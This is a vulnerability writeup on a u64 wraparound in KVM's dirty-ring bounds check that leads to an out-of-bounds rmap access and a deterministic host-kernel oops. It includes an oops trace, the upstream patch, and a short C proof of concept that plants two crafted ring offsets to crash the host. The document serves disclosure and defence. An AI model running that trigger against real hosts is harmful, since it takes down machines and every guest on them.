
A KVM dirty-ring OOB

Figure: Dirty-ring entries are writable from the VMM. A wrapped offset passes the check, then indexes 504 bytes before the rmap array into the vmalloc guard page.

A u64 wraparound in KVM's dirty-ring bounds check lets a userspace VMM drive an out-of-bounds index into the per-memslot reverse-map array. The rmap array lives in vmalloc address space, so the access lands inside the preceding guard page and faults before any value is loaded. The result is a deterministic host-kernel DoS. This writeup walks the bounds check, the wraparound, and why the vmalloc guard page closes the door cleanly enough that nothing downstream is reachable.

Verified on Linux v6.13.7 and v7.0.6. Target: virt/kvm/dirty_ring.c and arch/x86/kvm/mmu/mmu.c. Patched upstream on 2026-05-12 as commit 577a8d3bae05 ("KVM: Reject wrapped offset in kvm_reset_dirty_gfn()"), Cc: stable@vger.kernel.org. Fixes fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking"), the original 5.10 dirty-ring patch.

Setup: the dirty ring is shared writable

KVM's dirty-ring tracking tells the VMM which guest pages were dirtied since the last sync. Each ring entry is a struct kvm_dirty_gfn with three fields: flags, slot, and offset. The VMM maps ring pages with PROT_READ | PROT_WRITE so it can ack entries by writing flags. kvm_vcpu_mmap() at kvm_main.c:3982 leaves VM_WRITE intact for dirty-ring pages. No later policy limits which fields the VMM can write.

During reset, the kernel reads slot and offset back from the ring after the VMM has had a chance to overwrite them.

// virt/kvm/dirty_ring.c:125-126 -- kvm_dirty_ring_reset
next_slot   = READ_ONCE(entry->slot);    // attacker-controlled
next_offset = READ_ONCE(entry->offset);  // attacker-controlled

READ_ONCE prevents compiler re-reads. It performs no validation against the value the kernel originally wrote. The trust boundary points the wrong way.

Root cause: the bounds check wraps in u64

Inside kvm_reset_dirty_gfn(), the kernel coalesces a 64-bit mask of nearby dirty offsets and validates the highest bit against the memslot:

// virt/kvm/dirty_ring.c:69 -- kvm_reset_dirty_gfn
if (!memslot || (offset + __fls(mask)) >= memslot->npages)
    return;

Both offset and __fls(mask) are u64. With offset = 0xFFFFFFFFFFFFFFC1 and __fls(mask) = 63, the mathematical sum is 0x10000000000000000, which truncates to 0 in 64 bits. Zero is less than npages, so the check passes. Only the sum wrapped: offset itself is still 0xFFFFFFFFFFFFFFC1, and that value propagates downstream.
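The wrap can be reproduced in userspace. The sketch below is a minimal model of the pre-patch comparison, not the kernel function itself: old_check_accepts() is a hypothetical name, and npages = 512 in the usage note is an arbitrary memslot size chosen for illustration.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Userspace model of the pre-patch bounds check (hypothetical helper).
 * Returns 1 when the check would let the entry through, 0 when the
 * kernel would return early.
 */
static int old_check_accepts(uint64_t offset, unsigned fls_bit, uint64_t npages)
{
    /* __fls() of a 64-bit mask is always in 0..63. */
    assert(fls_bit < 64);

    /* Unsigned 64-bit addition wraps modulo 2^64, exactly as in the kernel. */
    return (offset + fls_bit) < npages;
}
```

With these assumptions, old_check_accepts(0xFFFFFFFFFFFFFFC1ULL, 63, 512) returns 1 because the sum wraps to 0, while the same offset with fls_bit = 62 returns 0 because the sum is 0xFFFFFFFFFFFFFFFF.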

Reaching the corner case requires getting __fls(mask) high enough. That is done by the coalescing loop a few lines up:

// virt/kvm/dirty_ring.c:138-142
s64 delta = next_offset - cur_offset;
if (delta >= 0 && delta < BITS_PER_LONG) {
    mask |= 1ull << delta;
    continue;
}

Two crafted ring entries are enough. The first sets offset = 0xFFFFFFFFFFFFFFC1, the second sets offset = 0. As a signed 64-bit subtraction, 0 - 0xFFFFFFFFFFFFFFC1 = 63, which falls inside [0, BITS_PER_LONG). Bit 63 of mask gets set. __fls(mask) = 63. The wrap fires.
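The signed-delta arithmetic is easy to check in isolation. The following is a hedged userspace sketch of the coalescing step: coalesce() and highest_bit() are hypothetical stand-ins for the loop body and for __fls(), and the starting mask of 1 (the first entry's own bit) is an assumption about the surrounding code that the excerpt does not show.

```c
#include <assert.h>
#include <stdint.h>

#define BITS_PER_LONG 64

/*
 * Model of the coalescing step (hypothetical helper): if next_offset lies
 * 0..63 pages above cur_offset, fold it into the mask and return 1.
 */
static int coalesce(uint64_t cur_offset, uint64_t next_offset, uint64_t *mask)
{
    /* The unsigned subtraction wraps; the cast reinterprets it as signed. */
    int64_t delta = (int64_t)(next_offset - cur_offset);

    if (delta >= 0 && delta < BITS_PER_LONG) {
        *mask |= 1ULL << delta;
        return 1;
    }
    return 0;
}

/* Index of the highest set bit, standing in for __fls() on nonzero input. */
static unsigned highest_bit(uint64_t mask)
{
    unsigned bit = 0;

    assert(mask != 0);
    while (mask >>= 1)
        bit++;
    return bit;
}
```

Starting from mask = 1 and calling coalesce(0xFFFFFFFFFFFFFFC1ULL, 0, &mask) sets bit 63, after which highest_bit(mask) is 63.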

Downstream: OOB into the rmap array

The wrapped offset reaches gfn_to_rmap() through the standard write-protect path:

// arch/x86/kvm/mmu/mmu.c:1010-1016 -- gfn_to_rmap
idx = gfn_to_index(gfn, slot->base_gfn, level);
return &slot->arch.rmap[level - PG_LEVEL_4K][idx];

// arch/x86/kvm/mmu/mmu.c:1213-1233 -- kvm_mmu_write_protect_pt_masked
while (mask) {
    rmap_head = gfn_to_rmap(slot->base_gfn + gfn_offset + __ffs(mask),
                            PG_LEVEL_4K, slot);
    rmap_write_protect(rmap_head, false);
    mask &= mask - 1;
}

With the wrap, idx evaluates to 0xFFFFFFFFFFFFFFC1: at PG_LEVEL_4K, gfn_to_index() reduces to gfn - base_gfn, which is the raw offset for the lowest mask bit. Interpreted as a signed index into the array, that is -63. Since sizeof(struct kvm_rmap_head) = 8, the target is exactly 8 * 63 = 504 bytes before the rmap allocation. Varying the crafted offset and the mask bit that drives __fls moves the target within a window of 8 to 504 bytes below rmap_array_base.
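The index-to-bytes conversion can be worked through as code. This is an illustrative sketch only: wrapped_index() and rmap_displacement() are hypothetical names, k stands for how far below 2^64 the crafted offset sits, and the signed cast relies on the two's-complement conversion that GCC and Clang implement.

```c
#include <assert.h>
#include <stdint.h>

#define RMAP_HEAD_SIZE 8  /* sizeof(struct kvm_rmap_head), as stated in the text */

/* Index produced by a crafted offset of 2^64 - k, for k in 1..63. */
static uint64_t wrapped_index(unsigned k)
{
    assert(k >= 1 && k <= 63);
    return (uint64_t)0 - k;
}

/*
 * Signed byte displacement from the rmap base for a given index.
 * The multiplication wraps modulo 2^64, just like pointer arithmetic on
 * the array would, and the cast recovers the negative displacement.
 */
static int64_t rmap_displacement(uint64_t idx)
{
    return (int64_t)(idx * RMAP_HEAD_SIZE);
}
```

For k = 63 the index is 0xFFFFFFFFFFFFFFC1 and the displacement is -504; for k = 1 the displacement is -8, which gives the two ends of the window.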

rmap_write_protect() then reads rmap_head->val at the OOB address. If non-zero, it interprets the value as either a direct SPTE pointer or a pte_list_desc * and clears the writable bit. That is a kernel OOB read followed by a conditional kernel OOB write at an attacker-influenced address. On a slab allocation it would be the start of a familiar exploit chain.

Where the rmap lives

The previous draft of this writeup assumed the rmap array was a slab object, and reasoned about spraying kmalloc-2048 or kmalloc-4096 neighbours to control the value at rmap_head->val. That reasoning is wrong. Look at the allocator:

// arch/x86/kvm/x86.c:13483
slot->arch.rmap[i] = __vcalloc(lpages, sz, GFP_KERNEL_ACCOUNT);

__vcalloc() wraps __vmalloc_array_noprof(), so the rmap array lives in vmalloc space. Every vmalloc area set up through __get_vm_area_node() has a guard page appended to it unless VM_NO_GUARD is set, and the rmap allocation leaves VM_NO_GUARD unset. The 4 KiB region directly below the rmap base is therefore the trailing guard of the preceding area (or an unallocated hole), and in either case it is unmapped. Page tables descend into the region, but the leaf PTE is zero.

The OOB window spans 8 to 504 bytes below the rmap base. The guard page is 4096 bytes. The window fits inside the guard for every allocator configuration, so the OOB load faults and the conditional write after it never executes.

Runtime verification

Stage A of the PoC drives the kernel into the OOB load and produces the following oops on v7.0.6 with kvm.tdp_mmu=0 (so that kvm_memslots_have_rmaps() is true):

BUG: unable to handle page fault for address: ffffaa6580034e08
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 1000067 P4D 1000067 PUD 1146067 PMD 1147067 PTE 0
RIP: 0010:rmap_write_protect+0x6/0xf0
RAX: ffffffffffffffc1   RBX: 8000000000000001
RDI: ffffaa6580034e08   RDX: ffffaa6580035000

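The registers line up with the analysis. RAX holds the wrapped index, 0xffffffffffffffc1. RDI, the rmap_head argument, equals the faulting address. RDX is 0x1f8 = 504 bytes above RDI, which is consistent with it holding the rmap base. The page-table walk ends at PTE 0, a not-present leaf, and the fault is a supervisor read at rmap_write_protect+0x6, before any store.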

This outcome is structural. The guard page sits between the previous vmalloc allocation and this one by allocator invariant. Every configuration of memslot size, NUMA placement, and surrounding vmap state preserves it.
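The addresses in the oops can be cross-checked against the predicted 504-byte displacement. The sketch below assumes that RDX (ffffaa6580035000) is the rmap base, which the trace does not state outright; slots_below_base() is a hypothetical helper.

```c
#include <assert.h>
#include <stdint.h>

#define RMAP_HEAD_SIZE 8u  /* sizeof(struct kvm_rmap_head), as stated in the text */

/*
 * Number of 8-byte rmap slots between a faulting address and the array
 * base above it. Both arguments are plain integers taken from an oops.
 */
static uint64_t slots_below_base(uint64_t base, uint64_t fault_addr)
{
    uint64_t gap;

    assert(fault_addr <= base);
    gap = base - fault_addr;

    /* A genuine rmap index always lands on a slot boundary. */
    assert(gap % RMAP_HEAD_SIZE == 0);
    return gap / RMAP_HEAD_SIZE;
}
```

Feeding in the RDX and RDI values from the trace gives a gap of 0x1f8 = 504 bytes, or 63 slots, matching the index of -63 derived earlier.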

Reachability of the conditional write

The conditional clear-bit primitive in rmap_write_protect() requires rmap_head->val to load successfully and return a non-zero value that passes either the direct-SPTE or the pte_list_desc interpretation. The load itself faults before any value is consumed, so neither interpretation is ever evaluated and the write is unreachable. The result is a host-kernel oops, full stop.

Proof of concept

Two ring entries with crafted offset values, a KVM_RESET_DIRTY_RINGS ioctl, and a host that panics on the spot:

// 1. Create VM with dirty ring enabled
int kvm_fd = open("/dev/kvm", O_RDWR);
int vm_fd  = ioctl(kvm_fd, KVM_CREATE_VM, 0);
// ... enable KVM_CAP_DIRTY_LOG_RING, create a memslot,
//     create a vCPU, run it long enough to push entries ...

// 2. Map the dirty ring read-write
struct kvm_dirty_gfn *ring = mmap(NULL, ring_size,
    PROT_READ | PROT_WRITE, MAP_SHARED,
    vcpu_fd, KVM_DIRTY_LOG_PAGE_OFFSET * PAGE_SIZE);

// 3. Mark all entries RESET, plant the wraparound pair
for (int i = 0; i < num_entries; i++) {
    ring[i].flags = KVM_DIRTY_GFN_F_RESET;
    if (i == target_idx) {
        ring[i].slot   = 0;
        ring[i].offset = 0xFFFFFFFFFFFFFFC1ULL;   // wraps the bound
    } else if (i == target_idx + 1) {
        ring[i].slot   = 0;
        ring[i].offset = 0;                       // delta = 63
    }
}

// 4. Trigger reset -- OOB rmap access -> guard-page fault -> oops
ioctl(vm_fd, KVM_RESET_DIRTY_RINGS, 0);

Preconditions: /dev/kvm access (typically the kvm group), KVM_CAP_DIRTY_LOG_RING enabled, and a memslot with an allocated rmap. The last requires shadow paging (ept=0 / npt=0 or kvm.tdp_mmu=0), nested virtualization with shadow roots, or write-tracked slots. Guests cannot trigger this path. The ring is mapped only from the vCPU fd, which only the VMM holds.

Impact

Factor                Value
Attack vector         Local (VMM process with /dev/kvm)
Complexity            Low (mmap + two ioctls)
Privileges required   /dev/kvm access, typically kvm group
User interaction      None
Scope                 Unchanged. VMM userspace crashes the host kernel
Confidentiality       None (OOB load is consumed internally, no readback channel)
Integrity             None (the OOB access faults before any value is loaded)
Availability          High (deterministic host kernel oops/panic)

The upstream fix

The patch replaces the one-line check with two. It tests offset >= memslot->npages first, so the sum is only evaluated once offset is known to be below npages. memslot->npages is bounded well below U64_MAX and __fls(mask) < BITS_PER_LONG, so at that point offset + __fls(mask) cannot wrap.

--- a/virt/kvm/dirty_ring.c
+++ b/virt/kvm/dirty_ring.c
@@ -63,7 +63,8 @@ static void kvm_reset_dirty_gfn(...)

 	memslot = id_to_memslot(__kvm_memslots(kvm, as_id), id);

-	if (!memslot || (offset + __fls(mask)) >= memslot->npages)
+	if (!memslot || offset >= memslot->npages ||
+	    offset + __fls(mask) >= memslot->npages)
 		return;

 	KVM_MMU_LOCK(kvm);

Landed as 577a8d3bae05 on 2026-05-12, marked Fixes: fb04a1eddb1a and Cc: stable@vger.kernel.org for backport to every kernel that ever shipped KVM_CAP_DIRTY_LOG_RING (5.10+).
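The effect of the fix can be modelled the same way as the bug. This is a userspace sketch under stated assumptions, not the kernel code: patched_check_accepts() is a hypothetical name, and npages = 512 in the usage note is an arbitrary memslot size.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Userspace model of the patched bounds check (hypothetical helper).
 * Returns 1 when the entry would be processed, 0 when the kernel
 * would return early.
 */
static int patched_check_accepts(uint64_t offset, unsigned fls_bit, uint64_t npages)
{
    /* __fls() of a 64-bit mask is always in 0..63. */
    assert(fls_bit < 64);

    /* New first test: a huge offset is rejected before any addition. */
    if (offset >= npages)
        return 0;

    /* offset < npages here, so adding at most 63 cannot wrap in practice. */
    return (offset + fls_bit) < npages;
}
```

patched_check_accepts(0xFFFFFFFFFFFFFFC1ULL, 63, 512) now returns 0, while an in-range entry such as (10, 5, 512) still returns 1 and an entry that runs off the end of the slot, such as (510, 5, 512), returns 0.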

The rmap array is __vcalloc'd. The OOB walks into vmalloc's guard page, away from adjacent kernel memory. The allocator decision kept this bounded.

References

Field             Value
Upstream commit   577a8d3bae05
Title             KVM: Reject wrapped offset in kvm_reset_dirty_gfn()
Fixes             fb04a1eddb1a ("KVM: X86: Implement ring-based dirty memory tracking")
Stable            Cc: stable@vger.kernel.org. Backport to all kernels with KVM_CAP_DIRTY_LOG_RING (5.10+)